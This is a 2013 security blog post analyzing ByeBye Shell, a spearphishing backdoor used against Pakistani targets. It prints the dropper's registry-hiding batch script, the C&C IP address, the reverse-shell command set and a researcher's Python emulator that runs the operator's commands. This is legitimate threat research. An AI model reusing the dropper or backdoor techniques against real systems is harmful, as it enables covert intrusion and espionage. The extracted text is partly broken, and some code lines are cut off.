### Information Security Pre

# ByeBye Shell and the targeting of Pakistan

Posted by Claudio Guarnieri in Information Security on Aug 19, 2013 2:10:45 PM

Asia and South Asia are a theater for daily attacks and numerous ongoing espionage campaigns between
neighboring countries, so many campaigns that it's hard to keep count. Recently I stumbled on yet another one,
which appears to have been active since at least the beginning of the year, and seems mostly directed at Pakistani
targets.

In this article we're going to analyze the nature of the attacks, the functionality of the backdoor - here labelled as
**ByeBye
 Shell - and the quick interaction I had with the operators behind this campaign.**

## Infection

No exploit was used in any of the attacks we attribute to this campaign - the attackers probably just relied on
social engineering the victim through well-crafted spearphishing emails.
The malware first appears to the victim as a .scr file. In some cases the attackers make use of the Left-to-Right
Override Unicode character in order to twist the .exe file extension into something more credible.
Once executed it drops and launches a batch script in a %Temp% subfolder with the following content:

01. @ echo off
02. @ start "IEXPLORE.EXE" "<backdoor>"
03. @ reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t R
04. @ reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt
05. @ reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHi
06. @ reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\
07. @ exit

As you can see, it enforces some configuration in the registry in order to hide file extensions and not show hidden
folders.
Subsequently the malware creates and launches a Cabinet
 Self-Extractor, which drops two additional executable
files: one embedding either a PDF or a Microsoft Office Word document, the other being the actual backdoor.
These are the hashes
 of
 the
 original
 droppers I inspected during this analysis:

8b4224dac114a9b8433913a1977f88b2

469cf94c457c17d8f24dacf9f9d41f33

6b349e439a17c4b66fb2a25965432aa9

d36da5c48d8fb7ee8c736ae183bf3f8a

The embedded documents all show content revolving around internal
 or
 foreign
 Pakistan
 politics - following are
some examples of such documents:


-----

This document appears to report an article that appeared on Hilal, the magazine of the Pakistan Armed Forces. You
can find a copy of the original article on this Pakistan institutional website.


-----

Also in this case the attacker seems to have just reused an existing article. Searching online for the content, it
appears to have been originally published on a website called SATribune, which is no longer online.
You can find a copy of the full article here.


-----

Again, the original article is available on Dawn.com.


-----

This last one coming instead from Reuters.

## Backdoor

Let's face it: at the point where the attackers obtain control over the target computer, not
 much
 sophistication
 is
**left
 in
 day-to-day
 targeted
 attacks. PoisonIvy, Gh0st and custom backdoors are daily business for threat analysts**
and malware researchers, in most cases being tedious work with little technical challenge.
This campaign is no exception. The main backdoor installed and executed on the victims' systems appears to be a
custom reverse shell with just a handful of features. Due to a lack of public literature about this case, I decided to
dub this family as ByeByeShell.

When disassembling the binary you can quickly understand the mechanics of the backdoor. After some quick

initialization, the backdoor XORs an embedded string with 0x9D to extract the IP address of the C&C server.

Subsequently it establishes a connection to it (generally on port 80) and checks in with some basic information

about the system.

LAB-­OF-­Me:

10.0.2.15............................................................UserName: User

HostName:lab

MAC: <MAC address>


-----

As you can see, it reports the computer name, the user name, the IP address and MAC address of the network
adapter. The [P130813] line appears to be a constant value, possibly a target identifier.
Interestingly, in a specific malware sample belonging to this campaign, the backdoor also appends the string "INS

**and AfPak" at the end of the message - note that, as defined by Wikipedia, "AfPak
 (or
 Af-Pak)
 is
 a
 neologism**

_used
 within
 US
 foreign
 policy
 circles
 to
 designate
 Afghanistan
 and
 Pakistan
 as
 a
 single
 theater
 of
 operations"._
After the check-in message is sent, the malware enters a continuous loop in which it will keep silently waiting for
commands from the open socket connection. From now on, it expects some manual interaction from the attacker.
The supported commands are:

**shell**

**comd**

**sleep**

**quit**

**kill**

You can see the switch block in the following screenshots.


-----

When a message is received from the socket connection, it checks
 if
 the
 message
 is
 "shell"
 then
 spawn
 a
**reverse
 shell, otherwise continues by checking for "comd"
 which
 will
 simply
 execute
 a
 command and returns.**


-----

If neither "shell" or "comd" is specified by the operator, it checks if it has been instructed to sleep or terminate,
otherwise it just continues to the next iteration.

In the following screenshot you can see how the reverse shell is implemented:
 it
 just
 launches
 a
 cmd.exe
 and
**pipes
 stdin,
 stdout
 and
 stderr
 to
 the
 opened
 socket so that the operator can directly interact with the Windows**
prompt.


-----

As you can see, this is an extremely basic backdoor, even poorly written if you ask me. Antivirus detection rate is
also reasonably good, despite consisting mostly of generic signatures.

The samples are also signed with an invalid Microsoft Windows certificate, which can be used for further
fingerprinting:


01. Certificate:
02. Data:
03. Version: 3 (0x2)
04. Serial Number:
05. 5b:b2:39:83:49:9b:89:a0:43:a8:10:3a:67:24:13:78
06. Signature Algorithm: md5WithRSAEncryption
07 I CN Mi ft Wi d


-----

11. Subject: CN=Microsoft Windows
12. Subject Public Key Info:
13. Public Key Algorithm: rsaEncryption
14. Public-­Key: (1024 bit)
15. Modulus:
16. 00:c6:e9:0c:5e:0a:09:39:db:58:a8:03:6c:60:da:
17. 32:ad:c5:3d:9a:39:91:ca:93:9f:ac:39:aa:3d:45:
18. 54:a7:63:e0:a7:c3:b0:b6:ee:2b:6c:bd:83:f9:9b:
19. 9b:e1:df:0d:e1:2a:96:e3:99:5e:52:0e:c7:c5:63:
20. 91:b4:e9:37:63:be:4b:62:23:2e:b8:00:f0:48:22:
21. 1e:ef:60:16:99:a4:08:2c:66:72:26:a2:68:1d:66:
22. a4:22:ff:a5:72:7a:ad:f8:78:9c:1f:2e:89:49:62:
23. f4:ba:6d:7f:f5:04:b1:9b:29:58:13:1d:f9:0f:a6:
24. 86:95:95:92:0b:57:9c:ca:39
25. Exponent: 65537 (0x10001)
26. X509v3 extensions:
27. 2.5.29.1:
28. 0D..g.yY,.^.Oxz..../..0.1.0...U....Microsoft Windows..[.9.I...C..:g$.x
29. Signature Algorithm: md5WithRSAEncryption
30. bd:b3:b3:95:14:aa:55:0d:80:4a:7b:d5:54:e9:43:e9:e1:36:
31. c1:7b:25:64:4b:a4:35:6f:55:81:d1:f5:9d:69:87:04:f3:8d:
32. 05:0a:49:31:0e:49:11:62:97:85:42:b4:37:63:ce:88:77:59:
33. 44:9c:83:03:9c:bb:95:f8:f4:8d:15:b5:1c:96:d4:af:ea:50:
34. 0a:cf:53:38:01:ed:00:6c:a0:90:f6:4c:8c:80:12:f3:ac:38:
35. b1:4f:d9:e9:d1:2b:8b:40:0e:9e:6b:38:45:a1:90:2d:fe:79:
36. 92:6d:f8:98:f1:a7:bf:9b:8d:7a:bc:89:77:12:33:29:6e:7e:
37. d2:ff

## Playing with the Attacker

In all the cases presented in this blog post, the backdoors tried to connect to the C&C located at 46.165.207.134,
which appears to be a dedicated server hosted by Leaseweb:

inetnum:        46.165.200.0 -­ 46.165.207.255

netname:        NETDIRECT-­NET

descr:          Leaseweb Germany GmbH (previously netdirekt e. K.)

remarks:        INFRA-­AW

country:        DE

admin-­c:        LSWG-­RIPE

tech-­c:         LSWG-­RIPE

status:         ASSIGNED PA

mnt-­by:         NETDIRECT-­MNT

mnt-­lower:      NETDIRECT-­MNT

mnt-­routes:     NETDIRECT-­MNT

source:         RIPE # Filtered

At the time of writing, the server appears to still be online. However port 80, which the backdoors try to contact,
appears to be available only sporadically. In order to get some fun out of an overall straightforward analysis, I
quickly hacked together a
 Python
 script
 that
 emulates
 a
 ByeBye
 backdoor - following is the code:

01. import os
02. import sys
03. import socket
04. import subprocess
05


-----

09. buf += "HostName:HOMEPC\n"
10. buf += "MAC: <MAC ADDRESS>\n"
11. buf += "Address 0: 192.168.0.5\n"
12. buf += "[P100713]\n"
13. buf += "$"
14.
15. # Emulating cmd.exe, hacky but works.
16. cmd = "Microsoft Windows XP [Version 5.1.2600]\n"
17. cmd += "(C) Copyright 1985-­2001 Microsoft Corp.\n"
18. prompt = "C:\Documents and Settings\User> "
19.
20. print("[*] Trying to connect to C&C...")
21.
22. # Try to establish connection with the C&C.
23. while True:
24. try:
25. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
26. sock.connect((host, 80))
27. except Exception as e:
28. print("[!] ERROR: Unable to connect: {0}".format(e))
29. sock.close()
30. continue
31. else:
32. subprocess.Popen('start alarm.mp3', shell=True)
33. break
34.
35. print("[*] Connected to C&C!")
36.
37. # Send check-­in message.
38. sock.send(buf)
39.
40. print("[*] Authenticated to C&C!")
41.
42. # This flag represents whether we should currently emulate a cmd.exe prompt
43. # or emulate the backdoor shell.
44. shell_mode = False
45.
46. # Main loop.
47. while True:
48. # Wait for incoming command.
49. try:
50. bufin = sock.recv(1024)
51. except KeyboardInterrupt:
52. break
53. except Exception as e:
54. print("[!] ERROR: Connection lost: {0}".format(e))
55. break
56.
57. data = bufin.strip()
58. if len(data) == 0:
59. continue
60.
61. print("[+] Received: {0}".format(data))
62.
63. # If we are in cmd.exe mode...
64. if shell_mode:
65. # If he tries to exit the cmd, we emulate that.


-----

69. continue
70. # If he tries to shutdown the system, I'm gonna interrupt.
71. elif 'shutdown' in data:
72. break
73. # I don't want him to kill processes.
74. elif 'taskkill' in data:
75. continue
76. # Otherwise just execute the command.
77. else:
78. proc = subprocess.Popen(data, stdout=subprocess.PIPE, stderr=subprocess.P
79. (out, err) = proc.communicate()
80.
81. if out:
82. lines = out.split('\n')
83. out_lines = []
84. for line in lines:
85. # Can filter output here, for instance remove process
86. # names or VirtualBox indicators and such.
87.
88. out_lines.append(line)
89.
90. # Send the findal cmd output.
91. sock.send('\n'.join(out_lines))
92. if err:
93. sock.send(err)
94.
95. sock.send(prompt)
96. else:
97. if data == 'kill':
98. # Should do this:
99. #sock.send('KILLED')
100. # But I'm disappointed:
101. sock.send('NOOooOOooOOooOOoo :-­( I thought we were friends!')
102. break
103. elif data == 'shell':
104. sock.send(cmd)
105. sock.send(prompt)
106. shell_mode = True
107. continue
108. elif data == 'sleep':
109. sock.send('BYE BYE\n')
110.
111. sock.send('$')
112.
113. if __name__ == '__main__':
114. if len(sys.argv) == 2:
115. main(sys.argv[1])
116. else:
117. main()

As you can see, this script simply tries to emulate the basic functionality of ByeBye: it performs the initial check-in
and waits for incoming messages from the operator.
Yes - since, as previously said, the C&C comes online only at times - I instructed the script to play an extremely
loud alarm. Props to my flatmate for waking me up whenever the alarm went off.
Surprisingly the operator responded few moments later my first attempt, although
 he
 quickly
 tried
 to
 terminate
 me
probably noticing an unexpected origin:


-----

[+] Received: shell

[+] Received: shutdown /r /t 0

Unfortunately at that time I didn't have the script completed, therefore he noticed something odd and closed my
connection.
I let a few days pass, completed the script and prepared a more credible scenario: a legitimate looking system
connecting out of South Asia. This time it took a bit longer to get some response from the operator, who simply
**tried
 to
 search
 for
 documents
 on
 the
 system:**

[+] Received: shell

[+] Received: systeminfo

[+] Received: dir /s *.pdf

[+] Received: dir /s *.doc

[+] Received: exit

[+] Received: sleep

Sadly no further activity was observed.

## Conclusions

This is yet another case of poorly skilled attackers managing to run successful espionage campaigns for extended
periods of time. This is probably one of the most basic incidents I encountered so far, but we can safely assume
that the operators behind this campaign are successful enough to maintain the operations running for at least the
last 6 months, possibly even more.
No clear indicator is available to make an informed estimate on what could be the origin of the attacks.

This work was brought to you by Claudio "nex" Guarnieri, Rapid7 Labs.

6940 Views Tags: malware, targeted, pakistan

Average User Rating

(2 ratings)

#### 0 Comments

**Please
 login
 to
 comment**

There are no comments on this post

Home  | Top of page  | Rapid7.com | Metasploit.com


-----